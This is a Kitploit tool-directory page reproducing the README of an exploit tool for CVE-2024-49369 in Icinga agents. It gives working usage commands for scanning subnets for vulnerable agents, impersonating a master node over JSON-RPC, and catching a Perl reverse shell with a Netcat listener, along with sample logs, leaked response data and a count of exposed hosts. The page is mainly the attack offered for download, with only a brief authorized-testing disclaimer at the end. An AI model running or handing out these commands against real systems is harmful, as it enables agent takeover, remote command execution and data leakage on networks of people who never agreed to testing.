Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-49369 — Exploit tool for CVE-2024-49369 in Icinga, enabling subnet scanning, agent takeover via JSON-RPC impersonation, arbitrary command execution, and reverse shell. | Kitploit
Tools/GitHubGitHub/quantum-sicarius/cve-2024-49369
ExploitationInformation GatheringNetwork SecurityPenetration TestingCommand and ControlRemote Access Tool
GitHubquantum-sicarius/cve-2024-49369

CVE-2024-49369

Exploit tool for CVE-2024-49369 in Icinga, enabling subnet scanning, agent takeover via JSON-RPC impersonation, arbitrary command execution, and reverse shell.

View Repository
2191 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-49369

Overview

This vulnerability leverages the Icinga JSON-RPC protocol to exploit monitored nodes running Icinga agents. By impersonating a Master/Satellite instance, attackers can potentially take over agents, execute arbitrary commands, or gain sensitive information.


How to Use

Scanning

To scan a subnet for vulnerable agents, run the following command:

python3 main.py scan --subnet 192.168.0.0/24 --vuln --batch 25

This scans the specified subnet in batches of 25 IPs. The tool sends an Icinga::HELLO message over the JSON-RPC protocol and identifies responding agents along with their versions.


Exploiting

If configuration and command execution is enabled on an endpoint (the default setting for monitored nodes with Icinga agents), an attacker can:

  1. Impersonate a Master/Satellite instance.
  2. Update the endpoint configuration.
  3. Execute arbitrary commands on the endpoint.

This can lead to full system compromise (depending on the service user) or limited access.

Prerequisites

  • Network disruptions or a restart of the target: The Icinga agent automatically rejects new connections from the same Master/Satellite instance until the existing connection is severed.

When the parent node is still connected, the exploit connections will look like this in the log:

[2024-12-11 09:13:03 -0500] information/ApiListener: New client connection for identity 'my_satellite' from [::ffff:192.168.0.1]:48120
[2024-12-11 09:13:04 -0500] information/ApiListener: New client connection for identity 'my_satellite' from [::ffff:192.168.0.1]:48124 (certificate validation failed: code 18: self signed certificate)
[2024-12-11 09:13:04 -0500] warning/ApiListener: No data received on new API connection from [::ffff:192.168.0.1]:48124 for identity 'my_satellite'. Ensure that the remote endpoints are properly configured in a cluster setup.

We can see this node is vulnerable to the attack as the warning for clusters is triggering, meaning that the current satellite is still connected, but this agent sees us as a valid parent.

Steps

  1. Start a Netcat listener for the reverse shell:

    nc -lvnp 9001
    
  2. Launch the exploit:

    python3 main.py exploit --host 192.168.0.5 --node-cn icinga_master --zone master --revip 192.168.0.1 --revport 9001
    
    • --host: Target agent's IP address.
    • --node-cn: Common name of the Master/Satellite to impersonate.
    • --zone: Targeted zone name. Default is master.
    • --revip: Attacker's IP address for reverse shell.
    • --revport: Attacker's port for reverse shell.

This command initiates repeated connection attempts. Once the target agent disconnects from its current parent, the tool takes over, sending and receiving checks.

Example Payload

A Perl-based reverse shell is used as part of a new check created by the tool.


Information Leakage

Even if configuration and command execution are disabled on the target, attackers may still glean sensitive data by observing the results of checks sent to the agent.

Example Response Data

{
  "jsonrpc": "2.0",
  "method": "config::UpdateObject",
  "params": {
    "config": "object Downtime ...",
    "name": "icinga-agent!load!9856e6b2...",
    "type": "Downtime",
    "version": 1733899523.67197
  }
}
{
  "jsonrpc": "2.0",
  "method": "event::SetLastCheckStarted",
  "params": {
    "host": "icinga-agent",
    "last_check_started": 1733899492.313578,
    "service": "icinga"
  },
  "ts": 1733899492.313714
}

These responses may reveal sensitive configurations, scheduling data, or even the results of monitored services.


Impact

On Censys there are currently 24,003 hosts with a publicly facing Icinga port. Spot checks indicate that most hosts are still running a vulnerable version of Icinga.


Credits

This research builds on the work discussed in Icinga's blog.


Notes

  • Always use this tool responsibly and within the scope of authorized security testing.
  • Vulnerability exploitation may have serious consequences. Verify legal permissions before usage.
Download Tool